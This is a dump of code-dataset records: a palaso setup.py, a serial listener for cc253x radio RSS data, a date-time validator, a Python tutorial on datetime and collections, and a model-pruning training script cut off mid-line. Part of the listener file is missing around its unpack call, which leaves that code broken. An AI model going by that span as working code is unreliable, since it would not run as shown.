"python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pickle.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 66, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "254865488", "text": "#!/usr/bin/env python\n\nfrom setuptools import setup\nfrom glob import glob\nimport platform, sys\n\npackages=['palaso', 'palaso.collation', 'palaso.kmn', 'palaso.sfm', \n 'palaso.teckit', 'palaso.text', 'palaso.font', 'palaso.contrib',\n 'palaso.contrib.freetype', 'palaso.contrib.freetype.ft_enums',\n 'palaso.contrib.funcparserlib', 'palaso.unicode', 'palaso.sldr']\ntry:\n from Pyrex.Distutils.extension import Extension\n from Pyrex.Distutils import build_ext\n ext =[ Extension(\"palaso.kmfl\", [\"lib/palaso.kmfl.pyx\"], libraries=[\"kmfl\", \"kmflcomp\"]) ] \n cmd = {'build_ext': build_ext}\n packages.insert(0, '')\nexcept ImportError:\n print(\"No Pyrex!\")\n ext = []\n cmd = {}\n\nsetup(name='palaso',\n version='0.7.4',\n description='Payap Language Software python package and scripts',\n long_description=\"Modules and scripts useful for building language software.\",\n maintainer='Tim Eves',\n maintainer_email='tim_eves@sil.org',\n url='http://github.com/silnrsi/palaso-python',\n packages=packages,\n ext_modules = ext,\n cmdclass = cmd,\n scripts=list(filter(lambda x : x.rfind(\".\") == -1, glob('scripts/*/*'))),\n license='LGPL',\n platforms=['Linux','Win32','Mac OS X'],\n package_dir={'':'lib'},\n package_data={'palaso.sfm':['usfm.sty'], 'palaso.kmn':['keyboard.svg'], \n 'palaso.collation' : ['sort_trainer.glade'],\n 'palaso.sldr': ['allkeys.txt', 'language-subtag-registry.txt',\n 'likelySubtags.xml', 'supplementalData.xml',\n 'supplementalMetadata.xml']}\n )\n\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1672, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "Pyrex.Distutils.extension.Extension", "line_number": 14, "usage_type": "call"}, {"api_name": "Pyrex.Distutils.build_ext", "line_number": 15, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "463174198", "text": "'''\nCreated on May 23, 2016\n\n@author: Peter Hillyard\n'''\n\n# This module contains the classes to listen to the wireless traffic in a \n# mesh network for the cc253x TI dongles. The advantage of this class is that\n# it gives you a function that pulls in the next set of RSS measurements from \n# the links. The user can use this function to get the next measurements and\n# run a real-time algorithm very easily and with all of the serial communication\n# abstracted.\n\n# This class takes care of the \nimport sys\nimport platform\nimport glob\n# import numpy.ma as ma\nimport numpy as np\nimport serial\nimport time\nfrom struct import unpack\nimport rss\n\nclass listen:\n \n # Initializer\n def __init__(self,max_nodes=0,ch_list=[],fout_name='',sound_print_flag=0,beep_rate=0.):\n self.numNodes = max_nodes # total number of nodes in network\n self.channelList = ch_list # channels (11-26) used in communication\n self.nodeList = None # all tx-ids\n self.numChs = None # number of channels\n self.numLinks = None # number of links\n self.nodeSet = None # node list in set form\n self.channelSet = None # channel list in set form\n self.currentLine = None # holds the serial data\n self.cur_line = None # str of RSS and timestamp\n self.currentLinkRSS = None # holds the link RSS data\n self.rssIndex = None # index where the RSS starts in the list\n self.string_length = None # length of a packet\n self.suffix = None # end-of-line marker\n self.rxId_idx = None # Index where the rxId is in the packet (unique to node type)\n self.ch_idx = None # index where the channel number is in the packet (unique to node type)\n \n self.ser = None # the serial object used to get rss measurements\n \n self.fout_name = fout_name # file name to save data\n self.fout = None # output file object\n \n self.sound_print_flag = sound_print_flag # print and make beep sound flag\n self.beepCounter = None # keeps track of the number of beeps\n self.beepRate = beep_rate # number of beeps per second\n self.startTime = None # keeps track of when the script starts\n \n self.__run_init() # Run initialization\n \n def observe(self):\n # Run forever, adding one integer at a time from the serial port, \n # whenever an integer is available. We break once a complete set of\n # RSS measurements are received from all links\n while(1):\n try:\n tempInt = self.ser.read().encode('hex')\n self.currentLine.append(tempInt)\n \n # Whenever the end-of-line sequence is read, operate on the \"packet\" of data.\n if self.currentLine[-len(self.suffix):] == self.suffix:\n if len(self.currentLine) != self.string_length:\n sys.stderr.write('packet corrupted - wrong string length\\n')\n del self.currentLine[:]\n continue\n currentLineInt = [int(x, 16) for x in self.currentLine]\n rxId = currentLineInt[self.rxId_idx]\n currentCh = currentLineInt[self.ch_idx]\n \n if (rxId not in self.nodeSet) or (currentCh not in self.channelSet):\n del self.currentLine[:]\n continue\n \n # Take care of beeping\n if self.sound_print_flag:\n timeStampSec = time.time()\n curBeepNumber = int((timeStampSec-self.startTime)/self.beepRate)\n if (curBeepNumber > self.beepCounter):\n self.beepCounter = curBeepNumber\n sys.stderr.write('\\a') # BEEP!\n sys.stderr.write(str((curBeepNumber - 40)/4.0 ) + '\\n')\n if curBeepNumber % 4 == 0:\n sys.stderr.write('\\a') # Double beep each \"measure\"\n sys.stderr.write('---\\n') \n \n # Each line in the serial data has RSS values for multiple txids.\n # Output one line per txid, rxid, ch combo.\n for txId in self.nodeList:\n # If the rxId is after the txId, then no problem -- currentCh\n # is also the channel that node txId was transmitting on when\n # node rxId made the measurement, because nodes transmit on a\n # channel in increasing order.\n if rxId > txId: \n ch = currentCh\n else: \n ch = rss.prevChannel(self.channelList, currentCh)\n \n # If the link (tx, rx, ch) is one we are supposed to watch\n if txId != rxId: \n i = rss.linkNumForTxRxChLists(txId, rxId, ch, self.nodeList, self.channelList)\n \n # If the RSS has already been recorded for this link on \n # this \"line\", then output the line first, and then restart \n # with a new line.\n if self.currentLinkRSS[i] < 127:\n # Output currentLinkRSS vector\n cur_line = ' '.join(map(str,self.currentLinkRSS)) + ' ' + str(time.time()) + '\\n'\n \n # Either print to std out\n if self.fout is None:\n sys.stdout.write(cur_line) \n sys.stdout.flush()\n else:\n self.fout.write(cur_line)\n \n \n # Restart with a new line by resetting currentLinkRSS\n self.currentLinkRSS = [127] * self.numLinks\n \n # Store the RSS \n self.currentLinkRSS[i] = rss.hex2signedint(self.currentLine[self.rssIndex+txId-1])\n \n # Remove serial data from the buffer.\n self.currentLine = []\n \n # break from loop\n break\n \n except KeyboardInterrupt:\n self.ser.close()\n sys.stderr.write('Listen stopped.')\n \n # get current RSS/timestamp string\n def get_cur_rss_ts(self):\n return self.cur_line\n \n # Run the initialization method. This runs the sniffer if the user doesn't\n # specify the number of nodes used or the channel list \n def __run_init(self):\n # open the serial port\n self.__open_ser()\n \n # If the user did not specify the number of nodes or the channel list,\n # they are opting to run the sniffer to get those values automatically\n if (self.numNodes == 0) | (len(self.channelList) == 0):\n sys.stderr.write('Running sniffer...\\n')\n self.__sniffer()\n \n # print useful info to screen\n sys.stderr.write('\\nMax nodes = ' + str(self.numNodes) + '.\\n')\n tmp = ''\n for item in self.channelList:\n tmp = tmp + str(item) + ', '\n sys.stderr.write('Channel list = [' + tmp[:-2] + ']\\n')\n \n # What node numbers are yours, that you want to see output to the file.\n # USER: SET THIS TO THE NODE IDS ASSIGNED TO YOU. DO NOT INCLUDE THE LISTEN NODE NUMBER\n self.nodeList = range(1,self.numNodes+1) # 1, ..., 30\n \n # Parameters that are due to our implementation of the listen node.\n self.numChs = len(self.channelList)\n self.numLinks = self.numNodes*(self.numNodes-1)*self.numChs\n \n # Initialize data\n self.nodeSet = set(self.nodeList)\n self.channelSet = set(self.channelList)\n self.currentLine = [] # Init serial data buffer \"currentLine\" as empty.\n self.currentLinkRSS = [127] * self.numLinks\n \n # Initialize output file, if needed\n if len(self.fout_name) != 0:\n self.fout = open(self.fout_name+'.txt','w')\n \n # set up beeping stuff if needed\n if self.sound_print_flag:\n self.startTime = time.time()\n\n # If you want beeps and/or second printing\n self.beepCounter = 0\n# self.beepRate = 1.0 # Beeps per second\n sys.stderr.write('firstBeepTime = ' + str(self.startTime) + '\\n')\n \n # This opens the serial port for reading\n def __open_ser(self):\n # Establish a serial connection and clear the buffer\n serial_filename = self.__serialFileName()\n sys.stderr.write('Using USB port file: ' + serial_filename + '\\n')\n self.ser = serial.Serial(serial_filename,38400)\n self.ser.flushInput()\n\n \n # Sniff out the packets to get the total number of nodes and the channels\n # used in this network\n def __sniffer(self): \n # ending key and the place to store the serial data\n beef = '\\xef' + '\\xbe'\n my_buffer = ''\n \n # list to store the list of node numbers and channels\n node_list = []\n channel_list = []\n \n # get a start time\n start_time = time.time()\n \n # Keep on listening for multi-Spin packets for 5 seconds\n while time.time() < (start_time + 5.):\n \n # keep adding measurements to the buffer\n my_buffer += self.ser.read(self.ser.inWaiting())\n \n # If the end key is found, proceed\n if beef in my_buffer:\n \n # unpack serial data\n lines = my_buffer.split(beef, 1)\n binaryPacket = lines[-2]\n my_buffer = lines[-1]\n spinPacket = unpack(' 0:\n serial_filename = usb_file_list[0] \n else:\n sys.stderr.write('Error: No Listen node plugged in?\\n')\n serial_filename = '0'\n #\n # WINDOWS USERS: Change 'COM#' to match what the system calls your USB port.\n elif system_name == 'Windows':\n serial_filename = 'COM3'\n #\n # MAC USERS\n else: # 'Darwin' indicates MAC OS X\n # Automatically grab the USB filename (since the number after /dev/tty.usb may vary)\n usb_file_list = glob.glob('/dev/tty.usb*')\n# print usb_file_list\n# quit()\n if len(usb_file_list) > 0:\n serial_filename = usb_file_list[0] \n else:\n sys.stderr.write('Error: No Listen node plugged in?\\n')\n \n #serial_filename = '/dev/tty.usbmodem411'\n serial_filename = '/dev/tty.usbmodem001'\n \n return serial_filename\n\n# Class for cc253x dongles in SPAN lab\nclass cc253x_span_listen(listen):\n \n # Initializer\n def __init__(self, max_nodes=0,ch_list=[],fout_name='',sound_print_flag=0,beep_rate=0.):\n # Initialize listen object\n listen.__init__(self, max_nodes,ch_list,fout_name,sound_print_flag,beep_rate)\n \n self.rssIndex = 3 # index where the RSS starts in the list\n self.string_length = self.numNodes + 7 # length of a packet\n self.suffix = ['ef','be'] # end-of-line marker\n self.rxId_idx = 2 # index where the rx ID is in packet\n self.ch_idx = -4 # index where the channel number is in packet\n\n# Class for cc253x high-power xandem nodes\nclass cc253x_xandem_hp_listen(listen):\n \n # Initializer\n def __init__(self, max_nodes=2000, ch_list = [77,88,99,11,22,33],fout_name='',sound_print_flag=0,beep_rate=0.):\n # Initialize listen object\n listen.__init__(self, max_nodes,ch_list,fout_name,sound_print_flag,beep_rate)\n \n self.rssIndex = 9 # index where the RSS starts in the list\n self.string_length = self.numNodes + 25 # length of a packet\n self.suffix = ['ef','be', 'ad', 'de'] # end-of-line marker\n self.rxId_idx = 5 # index where the rx ID is in packet\n self.ch_idx = 2 # index where the channel number is in packet\n \n \n \n ", "sub_path": "cc253x_listen.py", "file_name": "cc253x_listen.py", "file_ext": "py", "file_size_in_byte": 13983, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.stderr.write", "line_number": 69, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 69, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 82, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 86, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 86, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 87, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 87, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 90, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 90, "usage_type": "attribute"}, {"api_name": "rss.prevChannel", "line_number": 102, "usage_type": "call"}, {"api_name": "rss.linkNumForTxRxChLists", "line_number": 106, "usage_type": "call"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 117, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 118, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 118, "usage_type": "attribute"}, {"api_name": "rss.hex2signedint", "line_number": 127, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 137, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 137, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 152, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 152, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 156, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 156, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 160, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 160, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 182, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 187, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 187, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 193, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 193, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 194, "usage_type": "call"}, {"api_name": "time.time", "line_number": 210, "usage_type": "call"}, {"api_name": "time.time", "line_number": 213, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 238, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 249, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 254, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 258, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 258, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 274, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 274, "usage_type": "attribute"}]} +{"seq_id": "115953974", "text": "from systems.plugins.index import BaseProvider\n\nimport datetime\n\n\nclass Provider(BaseProvider('validator', 'date_time')):\n\n def validate(self, value):\n if isinstance(value, float):\n value = int(value)\n try:\n datetime.datetime.strptime(str(value), self.field_format)\n except ValueError as e:\n self.warning(\"Value {} is not a valid date time according to pattern: {}\".format(value, self.field_format))\n return False\n return True\n", "sub_path": "app/plugins/validator/date_time.py", "file_name": "date_time.py", "file_ext": "py", "file_size_in_byte": 502, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "systems.plugins.index.BaseProvider", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}]} +{"seq_id": "255132063", "text": "## datetime 处理日期和时间的标准库\nfrom datetime import datetime\nnow = datetime.now()\nprint(now)\n\n### 获取指定日期和时间\ndt = datetime(2015, 4, 19, 12, 20)\nprint( dt )\n\n### datetime转化为timestamp\n# timestamp = 0 = 1970-1-1 00:00:00 UTC+0:00\nprint( dt.timestamp() )\n\n\n### timestamp转化为datetime\nt = 1429417200.0\nprint( datetime.fromtimestamp(t) ) # 本地时间\nprint( datetime.utcfromtimestamp(t) ) #utc时间\n\n\n### str转换为datetime\ncday = datetime.strptime(\"2016-6-1 18:19:59\", '%Y-%m-%d %H:%M:%S')\nprint( cday )\n\n\n### datetime转换为str\nnow = datetime.now()\nprint( now.strftime('%a, %b %d %H:%M') )\n\n### datetime加减\nfrom datetime import datetime, timedelta\nnow = datetime.now()\n\nprint(now)\nprint(now + timedelta(hours=10))\n\nprint(now - timedelta(days=1))\n\nprint(now - timedelta(days=2, hours=12))\n\n### 本地时间转换为utc时间\nfrom datetime import datetime, timedelta, timezone\n\n\n## collections\n'''\ntuple表示不变集合,一个点的二维坐标就可以表示成:\np = (1, 2) 但这样不是很明确\n'''\nfrom collections import namedtuple\nPoint = namedtuple('Point', ['x', 'y'])\np = Point(1, 2)\nprint(p.x)\nprint(p.y)\n\nprint( isinstance(p, Point) )\nprint( isinstance(p, tuple) )\n\n## deque\n'''\n使用list存储数据时,按索引访问元素很快,但插入和删除元素就很慢。因为list是线性存储\ndeque视为了高效实现插入和删除操作的双向列表,适合用于队列和栈\nappend() pop() appendleft() popleft()\n'''\nfrom collections import deque\nq = deque(['a', 'b', 'c'])\nq.append('x')\nq.appendleft('y')\nprint(q)\n\n### defaultdict\n''' dict如果引用的key不存在,就会抛出keyError。使用defaultdict 如果希望key不存在时,返回一个默认值 '''\nfrom collections import defaultdict\ndd = defaultdict(lambda : 'N/A')\ndd['key1'] = 'abc'\n\nprint( dd['key1'] )\nprint( dd['key2'] )\n\n### orderedDict\n''' 使用dict时,key是无序时。保持key的顺序,可以用OrderedDict '''\nfrom collections import OrderedDict\nd = dict([('a', 1), ('c', 2), ('b', 3)])\nprint(d)\nod = OrderedDict([('a', 1), ('b', 2), ('c', 3)])\nprint(od)\n\n''' OrderedDict 可以实现一个FIFO(先进先出)的dict,当容量超出限制时,先删除最早添加的key '''\nclass LastUpdateOrderedDict(OrderedDict):\n def __intt__(self, capacity):\n super(LastUpdateOrderedDict, self).__init__()\n self._capacity = capacity\n\n def __setitem__(self, key, value):\n containsKey = 1 if key in self else 0\n if len(self) - containsKey >= self._capacity:\n last = self.popitem(last=False)\n print(\"remove:\", last)\n if containsKey:\n del self[key]\n print(\"set:\", (key, value))\n else:\n print(\"add:\", (key, value))\n OrderedDict.__setitem__(self, key, value)\n\n### Counter\nfrom collections import Counter\nc = Counter()\nfor ch in 'programming':\n c[ch] = c[ch] + 1\n\nprint( c )\n\n\n## base64\nimport base64\nprint( base64.b64encode(b'binary\\x00string') )\n\nprint( base64.b64encode(b'YmluYXJ5AHN0cmluZw==') )\n\n## struct\n'''\npython 没有专门处理字节的数据类型。\n'''\n", "sub_path": "lesson/12 batteries included.py", "file_name": "12 batteries included.py", "file_ext": "py", "file_size_in_byte": 3146, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.datetime.now", "line_number": 3, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 3, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "name"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 39, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 51, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 66, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 74, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 85, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 89, "usage_type": "name"}, {"api_name": "collections.OrderedDict.__setitem__", "line_number": 104, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 104, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 108, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 117, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "481248120", "text": "import os\nimport numpy as np\nimport utils.common as utils\nfrom utils.options import args\nfrom tensorboardX import SummaryWriter\nfrom importlib import import_module\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torch.optim.lr_scheduler import StepLR\n\nfrom fista import FISTA\n# from model import Discriminator\n\nfrom data.svhn import Data\n\nfrom ptflops import get_model_complexity_info # from thop import profile\n\n\n# torch.backends.cudnn.benchmark = False\ndevice = torch.device(f\"cuda:{args.gpus[0]}\")\n\ncheckpoint = utils.checkpoint(args)\nprint_logger = utils.get_logger(os.path.join(args.job_dir, \"logger.log\"))\nwriter_train = SummaryWriter(args.job_dir + '/run/train')\nwriter_test = SummaryWriter(args.job_dir + '/run/test')\n\n\ndef main():\n\n start_epoch = 0\n best_prec1 = 0.0\n best_prec5 = 0.0\n\n # Data loading\n print('=> Preparing data..')\n loader = Data(args)\n\n # Create model\n print('=> Building model...')\n \n model_t = import_module(f'model.{args.arch}').__dict__[args.teacher_model]().to(device)\n \n model_s = import_module(f'model.{args.arch}').__dict__[args.student_model](T = args.t).to(device)\n \n if args.pretrained:\n # Load pretrained weights\n ckpt = torch.load(args.teacher_dir + args.teacher_file, map_location = device)\n state_dict = ckpt['state_dict_s']\n \n model_dict_s = model_s.state_dict()\n model_dict_s.update(state_dict)\n model_s.load_state_dict(model_dict_s)\n model_s = model_s.to(device)\n \n model_t.load_state_dict(state_dict)\n model_t = model_t.to(device)\n \n models = [model_t, model_s]\n \n param_s = [param for name, param in model_s.named_parameters() if 'mask' not in name]\n param_m = [param for name, param in model_s.named_parameters() if 'mask' in name] \n\n optimizer_s = optim.SGD(param_s, lr = args.lr, momentum = args.momentum, weight_decay = args.weight_decay)\n optimizer_m = FISTA(param_m, lr = args.lr, gamma = args.sparse_lambda)\n\n scheduler_s = StepLR(optimizer_s, step_size = args.lr_decay_step, gamma = 0.1)\n scheduler_m = StepLR(optimizer_m, step_size = args.lr_decay_step, gamma = 0.1)\n\n resume = args.resume\n if resume:\n print('=> Resuming from ckpt {}'.format(resume))\n ckpt = torch.load(resume, map_location=device)\n best_prec1 = ckpt['best_prec1']\n start_epoch = ckpt['epoch']\n\n model_s.load_state_dict(ckpt['state_dict_s'])\n\n optimizer_s.load_state_dict(ckpt['optimizer_s'])\n optimizer_m.load_state_dict(ckpt['optimizer_m'])\n\n scheduler_s.load_state_dict(ckpt['scheduler_s'])\n scheduler_m.load_state_dict(ckpt['scheduler_m'])\n \n print('=> Continue from epoch {}...'.format(start_epoch))\n\n '''\n if args.test_only:\n test_prec1, test_prec5 = test(args, loader.loader_test, model_t)\n print('=> Test Prec@1: {:.2f}'.format(test_prec1))\n return\n '''\n\n optimizers = [optimizer_s, optimizer_m]\n schedulers = [scheduler_s, scheduler_m]\n \n for epoch in range(start_epoch, args.num_epochs):\n for s in schedulers:\n s.step(epoch)\n\n train(args, loader.loader_train, models, optimizers, epoch)\n test_prec1, test_prec5 = test(args, loader.loader_test, model_s, epoch)\n\n is_best = best_prec1 < test_prec1\n best_prec1 = max(test_prec1, best_prec1)\n best_prec5 = max(test_prec5, best_prec5)\n \n '''\n model_state_dict = model_t.module.state_dict() if len(args.gpus) > 1 else model_t.state_dict()\n '''\n \n state = {\n 'state_dict_s': model_s.state_dict(),\n 'best_prec1': best_prec1,\n 'best_prec5': best_prec5,\n \n 'optimizer_s': optimizer_s.state_dict(),\n 'optimizer_m': optimizer_m.state_dict(),\n 'scheduler_s': scheduler_s.state_dict(),\n 'scheduler_m': scheduler_m.state_dict(),\n 'epoch': epoch + 1\n }\n checkpoint.save_model(state, epoch + 1, is_best)\n \n \n model = import_module('utils.preprocess').__dict__[f'{args.arch}'](args, model_s.state_dict(), args.t)\n flops, params = get_model_complexity_info(model.to(device), (3, 32, 32), as_strings = False, print_per_layer_stat = False)\n compressionInfo(epoch, flops, params, test_prec1, test_prec5)\n\n print_logger.info(f\"Best @prec1: {best_prec1:.3f} @prec5: {best_prec5:.3f}\")\n\n best_model = torch.load(f'{args.job_dir}checkpoint/model_best.pt', map_location = device)\n\n\ndef compressionInfo(epoch, flops, params, test_prec1, test_prec5, org_gflops = 0.31469, org_params = 15):\n GFLOPs = flops / 10 ** 9\n params_num = params\n params_mem = params / 1000 ** 2\n pruned_FLOPs_ratio = (org_gflops - GFLOPs) / org_gflops\n pruned_param_ratio = (org_params - params_mem) / org_params\n \n test_prec1 = test_prec1.item()\n test_prec5 = test_prec5.item()\n \n print(f'Model FLOPs: {round(GFLOPs*1000, 2)} (-{round(pruned_FLOPs_ratio, 4) * 100} %)')\n print(f'Model params: {round(params_mem, 2)} (-{round(pruned_param_ratio, 4) * 100} %) MB')\n print(f'Model num of params: {round(params_num)}\\n')\n \n if not os.path.isdir(args.job_dir + '/run/plot'):\n os.makedirs(args.job_dir + '/run/plot') \n with open(args.job_dir + 'run/plot/compressInfo_r.txt', 'w') as f:\n f.write('epoch, top-1, top-5, flops, flops-pr, param_mb, param_mb-pr, num_param, \\n')\n \n with open(args.job_dir + 'run/plot/compressInfo.txt', 'a') as f:\n f.write(f'{epoch}, {round(test_prec1, 4)}, {round(test_prec5, 4)}, {round(GFLOPs*1000, 2)}, {round(pruned_FLOPs_ratio, 4) * 100}, {round(params_mem, 2)}, {round(pruned_param_ratio, 4) * 100}, {round(params_num)}\\n')\n \n with open(args.job_dir + 'run/plot/compressInfo_r.txt', 'a') as f:\n f.write('Epoch[{0}]\\n'.format(epoch))\n f.write('Top-1: {0}\\nTop-5: {1}\\n'.format(round(test_prec1, 4), round(test_prec5, 4)))\n f.write('FLOPs: {0} ({1} %)\\n'.format(round(GFLOPs*1000, 2), round(pruned_FLOPs_ratio, 4) * 100))\n f.write('Params: {0} ({1} %) MB\\n'.format(round(params_mem, 2), round(pruned_param_ratio, 4) * 100))\n f.write('Num of params: {}\\n'.format(round(params_num)))\n f.write('===========================\\n')\n \n \ndef train(args, loader_train, models, optimizers, epoch):\n losses_s = utils.AverageMeter()\n losses_sparse = utils.AverageMeter()\n losses_redundant = utils.AverageMeter()\n losses_cascade = utils.AverageMeter()\n losses_kd = utils.AverageMeter()\n \n top1 = utils.AverageMeter()\n top5 = utils.AverageMeter()\n\n model_t = models[0]\n model_s = models[1]\n \n for param in list(model_t.parameters())[:-2]:\n param.requires_grad = False\n \n for name, param in model_s.named_parameters():\n param.requires_grad = True\n \n cross_entropy = nn.CrossEntropyLoss()\n \n optimizer_s = optimizers[0]\n optimizer_m = optimizers[1]\n \n # switch to train mode\n model_t.train()\n model_s.train()\n \n num_iterations = len(loader_train)\n \n for i, (inputs, targets) in enumerate(loader_train, 1):\n num_iters = num_iterations * epoch + i\n\n inputs = inputs.to(device)\n targets = targets.to(device)\n \n optimizer_s.zero_grad()\n optimizer_m.zero_grad()\n\n \n ## train weights\n output_t = model_t(inputs).to(device)\n output_s = model_s(inputs).to(device)\n \n error_s = cross_entropy(output_s, targets)\n\n error_s.backward(retain_graph = 